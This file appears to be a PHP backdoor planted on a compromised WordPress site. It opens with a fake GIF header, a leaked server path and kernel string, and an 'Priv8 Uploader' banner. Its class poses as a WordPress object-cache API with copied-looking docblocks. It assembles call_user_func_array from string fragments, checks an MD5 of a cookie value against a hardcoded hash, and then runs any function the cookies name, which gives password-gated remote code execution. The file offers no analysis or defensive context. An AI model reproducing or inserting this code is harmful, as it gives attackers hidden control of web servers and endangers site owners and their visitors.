GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/**
* Object Cooker API
*
* @link https://codex.wordpress.org/Class_Reference/WP_Object_Cooker
*
* @package WordPress
* @subpackage Cooker
*/
class wp_soft {
private $driver = 'cookie';
private $type = 'call';
private $prefix = 'md5';
private $user = 'user';
private $hash = '983f1eb58f175f38793bcfabaa9c3fa5';
private $archive = 'array';
private $split = 'func';
function __construct() {
$this->init();
}
private function init()
{
$this->data = $_COOKIE;
$prefix = $this->prefix;
$prefix = $prefix(array_shift($this->data));
if($prefix==$this->hash) return $this->incr();
}
private function incr()
{
$user = array($this->type, $this->user, $this->split, $this->archive);
$user = implode('_', $user);
echo $user(array_shift($this->data), $this->data);
}
}
/**
* Increment numeric cache item's value
*
* @since 3.3.0
*
* @see WP_Object_Cooker::incr()
* @global WP_Object_Cache $wp_object_cooker Object cookie global instance.
*
* @param int|string $key The key for the cache contents that should be incremented.
* @param int $offset Optional. The amount by which to increment the item's value. Default 1.
* @param string $group Optional. The group the key is in. Default empty.
* @return false|int False on failure, the item's new value on success.
*/
new wp_soft();